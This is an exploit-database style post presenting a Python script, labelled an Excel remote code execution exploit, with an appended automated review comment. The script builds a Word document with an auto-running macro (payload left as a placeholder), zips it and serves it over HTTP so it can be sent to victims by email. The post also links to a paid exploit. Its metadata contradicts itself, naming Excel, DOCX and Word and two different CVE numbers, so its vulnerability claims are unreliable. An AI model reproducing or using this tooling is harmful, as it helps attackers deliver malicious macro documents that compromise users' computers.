
4 changes to exploits/shellcodes/ghdb FortiOS SSL-VPN 7.4.4 - Insufficient Session Expiration & Cookie Reuse Ingress-NGINX 4.11.0 - Remote Code Execution (RCE) Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
|
|
# Author: nu11secur1ty
|
|
# Date: 06/16/2025
|
|
# Vendor: Microsoft
|
|
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
|
|
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
|
|
# CVE-2025-47957
|
|
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise
|
|
|
|
## Description:
|
|
The attacker can trick any user into opening and executing their code by
|
|
sending a malicious DOCX file via email or a streaming server. After the
|
|
execution of the victim, his machine can be infected or even worse than
|
|
ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE
|
|
MACROS OPTIONS FROM YOUR OFFICE 365!!!
|
|
|
|
STATUS: HIGH-CRITICAL Vulnerability
|
|
|
|
|
|
[+]Exploit:
|
|
|
|
```
|
|
#!/usr/bin/python
|
|
# CVE-2025-47957 by nu11secur1ty
|
|
import os
|
|
import time
|
|
import zipfile
|
|
import threading
|
|
import http.server
|
|
import socket
|
|
import socketserver
|
|
import win32com.client
|
|
|
|
def get_local_ip():
|
|
"""Get the LAN IP address of the current machine."""
|
|
try:
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
s.connect(("8.8.8.8", 80)) # External DNS, just for routing
|
|
ip = s.getsockname()[0]
|
|
s.close()
|
|
return ip
|
|
except:
|
|
return "127.0.0.1"
|
|
|
|
def create_docm_with_auto_macro(filename):
|
|
script_dir = os.path.dirname(os.path.abspath(__file__))
|
|
full_path = os.path.join(script_dir, filename)
|
|
|
|
word = win32com.client.Dispatch("Word.Application")
|
|
word.Visible = False
|
|
doc = word.Documents.Add()
|
|
|
|
doc.Content.Text = "This document contains an auto-starting macro."
|
|
|
|
vbproject = doc.VBProject
|
|
vbcomponent = vbproject.VBComponents.Add(1) # Standard Module
|
|
|
|
macro_code = '''
|
|
Sub AutoOpen()
|
|
Call YOUR_PoC
|
|
End Sub
|
|
|
|
Sub YOUR_PoC()
|
|
Dim Program As String
|
|
Dim TaskID As Double
|
|
On Error Resume Next
|
|
Program = "YOUR_EXPLOIT_HERE"
|
|
TaskID = YOUR_TASK_HERE
|
|
If Err <> 0 Then
|
|
MsgBox "Can't start " & Program
|
|
End If
|
|
End Sub
|
|
'''
|
|
vbcomponent.CodeModule.AddFromString(macro_code)
|
|
|
|
wdFormatXMLDocumentMacroEnabled = 13
|
|
doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
|
|
doc.Close()
|
|
word.Quit()
|
|
|
|
print(f"[+] Macro-enabled .docm saved at: {full_path}")
|
|
return full_path
|
|
|
|
def compress_to_zip(filepath):
|
|
zip_path = filepath + '.zip'
|
|
with zipfile.ZipFile(zip_path, 'w') as zipf:
|
|
zipf.write(filepath, arcname=os.path.basename(filepath))
|
|
print(f"[+] Compressed to ZIP: {zip_path}")
|
|
return zip_path
|
|
|
|
def start_http_server(directory, port=8000):
|
|
os.chdir(directory)
|
|
handler = http.server.SimpleHTTPRequestHandler
|
|
httpd = socketserver.TCPServer(("", port), handler)
|
|
ip = get_local_ip()
|
|
print(f"[+] HTTP server running at: http://{ip}:{port}/")
|
|
|
|
thread = threading.Thread(target=httpd.serve_forever)
|
|
thread.daemon = True
|
|
thread.start()
|
|
return httpd
|
|
|
|
if __name__ == "__main__":
|
|
filename = "CVE-2025-47957.docm"
|
|
docm_path = create_docm_with_auto_macro(filename)
|
|
zip_path = compress_to_zip(docm_path)
|
|
server = start_http_server(os.path.dirname(docm_path))
|
|
|
|
try:
|
|
print("[*] Server running — press Ctrl+C to stop...")
|
|
while True:
|
|
time.sleep(1)
|
|
except KeyboardInterrupt:
|
|
print("\n[!] Ctrl+C detected — shutting down server...")
|
|
server.shutdown()
|
|
print("[+] The Exploit Server stopped. Goodbye!")
|
|
|
|
```
|
|
|
|
# Reproduce:
|
|
[href](https://www.youtube.com/watch?v=r4NsGrO56yo)
|
|
|
|
# Buy an exploit only:
|
|
[href](https://satoshidisk.com/pay/COeJqt)
|
|
|
|
# Time spent:
|
|
01:37:00
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/>
|
|
|
|
--
|
|
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstorm.news/
|
|
https://cve.mitre.org/index.html
|
|
https://cxsecurity.com/ and https://www.exploit-db.com/
|
|
0day Exploit DataBase https://0day.today/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |
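Review bot: The metadata at the top of this new file does not agree with the code below it: the title names Microsoft Excel and the description a DOCX file, the script saves a `.docm` through `Word.Application`, and the `# Reference:` URL cites CVE-2025-27751 while the following line and the script comment say CVE-2025-47957. From what is visible, the script only builds a document whose `AutoOpen` macro body is placeholders (`YOUR_EXPLOIT_HERE`, `YOUR_TASK_HERE`) and serves the script directory over HTTP, so nothing in it appears specific to either CVE; a header comment saying so would keep readers from treating it as a working proof for that CVE, and the relevant mitigation is the usual policy of blocking or restricting VBA macros. In `get_local_ip()` the bare `except:` also hides unrelated errors and leaks the socket on failure; `except OSError:` with the socket in a `with` block would fix both. In `create_docm_with_auto_macro()` `doc.Close()` and `word.Quit()` run only on success, so a failed `SaveAs` leaves a hidden Word instance behind; moving them into a `finally:` avoids that.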